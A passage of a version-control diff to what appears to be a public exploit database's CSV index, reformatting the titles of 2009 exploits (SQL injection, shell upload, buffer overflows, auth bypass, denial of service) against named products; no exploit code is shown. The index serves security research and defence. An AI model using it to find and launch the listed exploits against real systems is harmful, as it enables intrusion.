Vulnerabilities",2009-05-18,girex,php,webapps,0 @@ -8229,7 +8229,7 @@ id,file,description,date,author,platform,type,port 8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta - (id) SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher Remote Change Admin Password Exploit",2009-05-18,ahmadbady,php,webapps,0 -8730,platforms/php/webapps/8730.txt,"VidShare Pro Arbitrary Shell Upload",2009-05-19,InjEctOr5,php,webapps,0 +8730,platforms/php/webapps/8730.txt,"VidShare Pro - Arbitrary Shell Upload",2009-05-19,InjEctOr5,php,webapps,0 8731,platforms/php/webapps/8731.php,"Joomla com_gsticketsystem - (catid) Blind SQL Injection Exploit",2009-05-19,InjEctOr5,php,webapps,0 8732,platforms/windows/remote/8732.py,"httpdx 0.5b FTP Server - (CWD) Remote BoF Exploit (SEH)",2009-05-19,His0k4,windows,remote,21 8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote BoF Exploit",2009-05-19,rgod,windows,remote,0 @@ -8249,7 +8249,7 @@ id,file,description,date,author,platform,type,port 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection Exploit",2009-05-20,"ThE g0bL!N",php,webapps,0 8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 - (list_list.php id) SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 8749,platforms/asp/webapps/8749.txt,"DMXReady Registration Manager 1.1 - Arbitrary File Upload",2009-05-20,Securitylab.ir,asp,webapps,0 -8750,platforms/php/webapps/8750.txt,"PHP Article Publisher Arbitrary Auth Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 +8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Auth Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Remote Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0 8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 @@ -8259,7 +8259,7 @@ id,file,description,date,author,platform,type,port 8757,platforms/windows/remote/8757.html,"BaoFeng - (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames - (CGAgent.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injection",2009-05-21,YEnH4ckEr,php,webapps,0 -8761,platforms/php/webapps/8761.txt,"Article Directory (Auth Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0 +8761,platforms/php/webapps/8761.txt,"Article Directory - (Auth Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0 8762,platforms/php/webapps/8762.txt,"Article Directory - (page.php) Remote Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0 8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps,0 8764,platforms/php/webapps/8764.txt,"ZaoCMS - (download.php) Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps,0 @@ -8329,7 +8329,7 @@ id,file,description,date,author,platform,type,port 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - (id) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Auth Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 URL Search Hook (Windows Explorer) Remote BoF PoC",2009-06-01,Nine:Situations:Group,windows,dos,0 -8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console Arbitrary Command Exec",2009-06-01,Securitum,hardware,local,0 +8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console - Arbitrary Command Exec",2009-06-01,Securitum,hardware,local,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection Exploit",2009-06-01,Br0ly,php,webapps,0 8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - (IAManager.dll) Remote BoF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injection",2009-06-01,"Nico Leidecker",php,webapps,0 @@ -8341,7 +8341,7 @@ id,file,description,date,author,platform,type,port 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn Remote Denial of Service",2009-06-01,kingcope,multiple,dos,0 8843,platforms/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 - Credentials Changer SQL Exploit",2009-06-01,YEnH4ckEr,php,webapps,0 8844,platforms/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 - Multiple SQL Injection",2009-06-01,YEnH4ckEr,php,webapps,0 -8846,platforms/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console Arbitrary Command Exec",2009-06-01,Securitum,hardware,remote,0 +8846,platforms/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Exec",2009-06-01,Securitum,hardware,remote,0 8847,platforms/php/webapps/8847.txt,"Joomla Component Joomlaequipment 2.0.4 - (com_juser) SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps,0 8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - (article_view_photo.php id) SQL Injection",2009-06-01,taRentReXx,php,webapps,0 8849,platforms/asp/webapps/8849.txt,"R2 Newsletter Lite/Pro/Stats - (admin.mdb) Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 @@ -8350,7 +8350,7 @@ id,file,description,date,author,platform,type,port 8852,platforms/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,php,webapps,0 8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusion",2009-06-02,YEnH4ckEr,php,webapps,0 8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection Exploit",2009-06-02,YEnH4ckEr,php,webapps,0 -8855,platforms/php/webapps/8855.txt,"AlstraSoft Article Manager Pro Remote Shell Upload",2009-06-02,ZoRLu,php,webapps,0 +8855,platforms/php/webapps/8855.txt,"AlstraSoft Article Manager Pro - Remote Shell Upload",2009-06-02,ZoRLu,php,webapps,0 8856,platforms/php/webapps/8856.txt,"flashlight free edition - (LFI/SQL) Multiple Vulnerabilities",2009-06-02,K4m1k451,php,webapps,0 8857,platforms/php/webapps/8857.txt,"WebCal - (webCal3_detail.asp event_id) SQL Injection",2009-06-02,Bl@ckbe@rD,php,webapps,0 8858,platforms/php/webapps/8858.txt,"propertymax pro free - (SQL/XSS) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0 @@ -8369,7 +8369,7 @@ id,file,description,date,author,platform,type,port 8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - (init.php anticode) Code Execution",2009-06-03,SirGod,php,webapps,0 8872,platforms/php/webapps/8872.txt,"Joomla Component com_mosres - Multiple SQL Injection",2009-06-03,"Chip d3 bi0s",php,webapps,0 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos,0 -8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar Arbitrary Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 +8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - (OAmon.sys) Local Privilege Escalation Exploit",2009-06-04,"NT Internals",windows,local,0 8876,platforms/php/webapps/8876.htm,"Web Directory PRO - (admins.php) Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 8877,platforms/php/webapps/8877.txt,"Host Directory PRO 2.1.0 - Remote Database Backup",2009-06-04,ZoRLu,php,webapps,0 @@ -8381,7 +8381,7 @@ id,file,description,date,author,platform,type,port 8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Auth Bypass) SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Remote Blind SQL Injection Exploit",2009-06-05,YEnH4ckEr,php,webapps,0 -8886,platforms/php/webapps/8886.txt,"MyCars Automotive (Auth Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0 +8886,platforms/php/webapps/8886.txt,"MyCars Automotive - (Auth Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8890,platforms/asp/webapps/8890.txt,"fipsCMS Light 2.1 - (db.mdb) Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8891,platforms/php/webapps/8891.txt,"Joomla Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 @@ -8461,7 +8461,7 @@ id,file,description,date,author,platform,type,port 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi - (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow Exploit (Metasploit)",2009-06-16,Trancer,windows,remote,0 8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - naPolicyManager.dll ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 -8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 Unicode Buffer Overrun/DoS",2009-06-16,LiquidWorm,windows,dos,0 +8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/DoS",2009-06-16,LiquidWorm,windows,dos,0 8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - Remote File Disclosure (.htaccess)",2009-06-16,daath,php,webapps,0 8975,platforms/php/webapps/8975.txt,"phpFK 7.03 - (page_bottom.php) Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0 @@ -8510,7 +8510,7 @@ id,file,description,date,author,platform,type,port 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injection",2009-06-26,YEnH4ckEr,php,webapps,0 9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Auth Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - (index.php page) LFI",2009-06-26,SirGod,php,webapps,0 -9026,platforms/php/webapps/9026.txt,"WHOISCART (Auth Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 +9026,platforms/php/webapps/9026.txt,"WHOISCART - (Auth Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0 9028,platforms/php/webapps/9028.txt,"Joomla Component com_php - (id) Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BoF PoC",2009-06-29,Trancer,windows,dos,0 @@ -8549,7 +8549,7 @@ id,file,description,date,author,platform,type,port 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - (.lst / .m3u) Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 -9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera (GET Request) Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 +9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - (GET Request) Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 9068,platforms/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9069,platforms/php/webapps/9069.txt,"cms chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - (.pls) Local Buffer Overflow Exploit (SEH)",2009-07-01,Stack,windows,local,0 @@ -8566,8 +8566,8 @@ id,file,description,date,author,platform,type,port 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0 -9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 = COM_CREATE_DB Format String PoC (Auth)",2009-07-09,kingcope,multiple,dos,0 -9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 +9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 = COM_CREATE_DB Format String PoC - (Auth)",2009-07-09,kingcope,multiple,dos,0 +9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Shell Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 9089,platforms/php/webapps/9089.txt,"ClearContent - (image.php url) RFI/LFI",2009-07-09,MizoZ,php,webapps,0 @@ -8589,7 +8589,7 @@ id,file,description,date,author,platform,type,port 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - (uid) SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (XSS/SQL/RCE) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 -9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 +9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection/RCE Exploit",2009-07-10,darkjoker,php,webapps,0 9110,platforms/php/webapps/9110.txt,"WordPress Core & Plugins - Privileges Unchecked in admin.php and Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injection",2009-07-10,Moudi,php,webapps,0 @@ -8607,7 +8607,7 @@ id,file,description,date,author,platform,type,port 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - (.M3U/M3L/TXT) Local Stack Overflow PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injection",2009-07-11,MizoZ,php,webapps,0 9126,platforms/php/webapps/9126.txt,"Joomla Component com_category - (catid) SQL Injection",2009-07-11,Prince_Pwn3r,php,webapps,0 -9127,platforms/php/webapps/9127.txt,"d.net CMS Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0 +9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection Exploit",2009-07-11,darkjoker,php,webapps,0 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - (response) Remote BoF Exploit (SEH)",2009-07-12,His0k4,windows,remote,0 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (bSQL/XSS) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 @@ -8643,7 +8643,7 @@ id,file,description,date,author,platform,type,port 9160,platforms/multiple/dos/9160.txt,"Multiple Web Browsers - Denial of Service",2009-07-15,"Thierry Zoller",multiple,dos,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - (profile.php) SQL Injection",2009-07-15,Arka69,php,webapps,0 -9163,platforms/windows/dos/9163.txt,"Microsoft Office Web Components (Spreadsheet) ActiveX BoF PoC",2009-07-16,anonymous,windows,dos,0 +9163,platforms/windows/dos/9163.txt,"Microsoft Office Web Components (Spreadsheet) - ActiveX BoF PoC",2009-07-16,anonymous,windows,dos,0 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Auth Bypass) SQL Injection Exploit",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 @@ -8699,7 +8699,7 @@ id,file,description,date,author,platform,type,port 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 -9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 +9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection",2009-07-21,n3w7u,php,webapps,0 9226,platforms/php/webapps/9226.txt,"phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 @@ -8752,7 +8752,7 @@ id,file,description,date,author,platform,type,port 9277,platforms/windows/dos/9277.pl,"MP3 Studio 1.0 - (.mpf /.m3u) Local Stack Overflow PoC",2009-07-27,hack4love,windows,dos,0 9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection Exploit",2009-07-27,Dante90,php,webapps,0 -9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 Delete Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0 +9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 Delete - Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0 9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Auth Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0 9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Auth Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 @@ -8828,7 +8828,7 @@ id,file,description,date,author,platform,type,port 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - (bSQL/ LFI) Multiple Vulnerabilities",2009-08-04,PLATEN,php,webapps,0 -9357,platforms/cgi/webapps/9357.txt,"Perl$hop e-commerce Script Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 +9357,platforms/cgi/webapps/9357.txt,"Perl$hop e-commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 9358,platforms/php/webapps/9358.txt,"In-Portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Buffer Overflow PoC",2009-08-04,hack4love,windows,dos,0 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - (.PLF) Universal BoF Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0 @@ -8863,7 +8863,7 @@ id,file,description,date,author,platform,type,port 9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Auth Bypass) Blind SQL Injection Exploit",2009-08-07,"Jafer Al Zidjali",php,webapps,0 -9395,platforms/php/webapps/9395.txt,"PHPCityPortal (Auth Bypass) SQL Injection",2009-08-07,CoBRa_21,php,webapps,0 +9395,platforms/php/webapps/9395.txt,"PHPCityPortal - (Auth Bypass) SQL Injection",2009-08-07,CoBRa_21,php,webapps,0 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (RFI/LFI/XSS) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (RFI/LFI/XSS) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0 9398,platforms/php/webapps/9398.php,"Joomla Component com_pms 2.0.4 - (Ignore-List) SQL Injection Exploit",2009-08-07,M4dhead,php,webapps,0 @@ -8883,7 +8883,7 @@ id,file,description,date,author,platform,type,port 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - (.EOT) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 -9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 +9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b - (Auth Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - (gallery.php) Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps,0 9422,platforms/hardware/remote/9422.txt,"2Wire Gateway - Authentication Bypass / Password Reset",2009-08-12,hkm,hardware,remote,0 @@ -8919,7 +8919,7 @@ id,file,description,date,author,platform,type,port 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BoF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0 -9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User",2009-08-18,SuNHouSe2,hardware,remote,0 +9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin User",2009-08-18,SuNHouSe2,hardware,remote,0 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - (.mp3) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Auth Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 @@ -8935,8 +8935,8 @@ id,file,description,date,author,platform,type,port 9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in slideshow 1.51 - Shell Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 9470,platforms/php/webapps/9470.txt,"PHP Email Manager - (remove.php ID) SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0 -9472,platforms/php/webapps/9472.txt,"Best Dating Script Arbitrary Shell Upload",2009-08-18,jetli007,php,webapps,0 -9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0 +9472,platforms/php/webapps/9472.txt,"Best Dating Script - Arbitrary Shell Upload",2009-08-18,jetli007,php,webapps,0 +9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 @@ -8957,7 +8957,7 @@ id,file,description,date,author,platform,type,port 9491,platforms/php/webapps/9491.txt,"Dow Group - (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Local Kernel Buffer Overflow Exploit",2009-08-24,Heurs,windows,local,0 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0 -9494,platforms/php/webapps/9494.txt,"humanCMS (Auth Bypass) SQL Injection",2009-08-24,next,php,webapps,0 +9494,platforms/php/webapps/9494.txt,"humanCMS - (Auth Bypass) SQL Injection",2009-08-24,next,php,webapps,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - (.wav) Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9496,platforms/windows/dos/9496.txt,"WAR-FTPD 1.65 - (MKD/CD Requests) Denial of Service",2009-08-24,"opt!x hacker",windows,dos,0 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - (itechd.php productid) Blind SQL Injection Exploit",2009-08-24,Mr.SQL,php,webapps,0 @@ -8979,7 +8979,7 @@ id,file,description,date,author,platform,type,port 9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Proof of Concept",2009-08-25,"Jon Oberheide",linux,local,0 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0 9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0 -9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP ActiveX Remote DoS",2009-08-25,"Francis Provencher",windows,dos,0 